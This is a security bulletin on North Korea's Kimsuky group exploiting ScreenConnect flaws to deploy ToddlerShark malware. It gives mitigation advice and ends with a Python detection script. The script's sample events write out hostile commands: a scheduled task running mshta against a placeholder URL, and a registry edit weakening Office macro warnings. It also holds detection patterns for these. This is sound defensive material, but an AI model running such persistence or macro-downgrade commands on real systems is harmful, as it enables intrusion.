ScreenConnect Flaws Exploited to Drop New ToddlerShark Malware

Late last month, ConnectWise addressed two flaws impacting its remote access software ScreenConnect, which could be exploited by actors to bypass authentication (CVE-2024-1709) and execute code remotely (CVE-2024-1708). Since then, several threat actors have abused the flaws, particularly CVE-2024-1709, in the wild to deploy various payloads including ransomware (Black Basta, Bl00dy, LockBit), remote access trojans, info stealers, and much more. According to cybersecurity analysts at Kroll, North Korean APT group Kimsuky has now joined in the exploitation of these flaws to infect victims with a new malware variant dubbed ToddlerShark. ToddlerShark is believed to be a new variant of the group’s BabyShark and ReconShark backdoors and is mainly designed to harvest/collect system data (hostname, user accounts, active user sessions, running processes, etc.) and maintain persistent access to the target system through the help of scheduled tasks. Notable about the malware is its ability to evade detection through the use of legitimate Microsoft binaries such as mshta.exe, which is further used to execute heavily obfuscated VBScript scripts, making analysis more challenging. ToddlerShark is also capable of modifying the Windows Registry to allow macros to run without triggering alerts and employs randomized strings to alter its structural pattern, rendering signature-based detections ineffective.

Security Officer Comments:
Proof-of-concept exploit code has been released for both CVE-2024-1708 and CVE-2024-1709, making it easier for actors like Kimsuky to exploit the flaws for initial access into victim environments and deploy their various payloads. Taking a look at metrics from ShadowServer, there are still thousands of instances vulnerable to CVE-2024-1709. The majority of these instances reside in the United States (2.6K), followed by the United Kingdom (365), and Canada (292), leaving ample opportunity for actors to launch exploitation attempts.

Suggested Corrections:
Kroll has included a set of TTPs employed by the actors in the latest campaign as well as recommended measures for defending against potential attacks in the wild leveraging the recently addressed ConnectWise flaws. In general, Kroll recommends:
  • Any systems running ConnectWise ScreenConnect versions 23.9.7 and prior should assume compromise and be patched immediately, following the guidance in the ConnectWise advisory.
  • Consider having an independent threat hunt/compromise assessment completed on your systems to ensure that suspicious activity or malware was not inserted prior to patching or remediation.
  • Ensure protection and monitoring of systems, especially those that are directly available on the internet, with an endpoint detection and response (EDR) or next-generation antivirus (NGAV) tool specifically tailored or configured to conduct system scans for webshells.
  • Ensure implementation or configuration of a Web Application Firewall (WAF) or equivalent web traffic monitoring system for purposes of allowing analysis in the event of potential exploitation.
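As an added defender-side example (not Kroll's or ConnectWise's code), the following Python performs two of the checks discussed above over constructed input: a numeric comparison of a ScreenConnect version against the 23.9.7 cutoff, and a few rules applied to constructed Sysmon-style process-creation events for the mshta.exe, scheduled-task and macro-registry behaviours attributed to ToddlerShark. The event fields, the VBAWarnings registry value and the ScreenConnect-parent heuristic are assumptions for illustration, not details taken from the report.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files (x86)\ScreenConnect\Bin\ScreenConnect.Service.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Execute("placeholder obfuscated script")'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /sc minute /mo 30 /tn "Updater" /tr "mshta http://placeholder.invalid/a.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     # VBAWarnings is an assumed example of a macro-security registry value; the report names no key.
     "CommandLine": r'reg add "HKCU\Software\Microsoft\Office\16.0\Word\Security" /v VBAWarnings /t REG_DWORD /d 1 /f'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]


def is_vulnerable_version(version: str) -> bool:
    """True for ScreenConnect 23.9.7 and prior, comparing numerically.

    A plain string comparison would wrongly rank "23.10.x" below "23.9.7";
    only the first three components matter for the cutoff.
    """
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= (23, 9, 7)


def classify_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules an event matches."""
    image, cmd, parent = (ev[k].lower() for k in ("Image", "CommandLine", "ParentImage"))
    hits = []
    if image.endswith("mshta.exe") and re.search(r"vbscript:|javascript:|\.hta\b|https?://", cmd):
        hits.append("mshta-script-execution")          # LOLBin running inline/remote script
    if image.endswith("schtasks.exe") and "/create" in cmd and re.search(r"mshta|wscript|cscript|powershell", cmd):
        hits.append("scheduled-task-persistence")      # task whose action is a script host
    if image.endswith("reg.exe") and "vbawarnings" in cmd:
        hits.append("macro-security-downgrade")        # Office macro warnings being altered
    if "screenconnect" in parent and image.endswith(("cmd.exe", "powershell.exe", "mshta.exe")):
        hits.append("screenconnect-spawned-shell")     # assumed post-exploitation heuristic
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to matched rules, omitting events with no hits."""
    return {i: classify_event(e) for i, e in enumerate(events) if classify_event(e)}
```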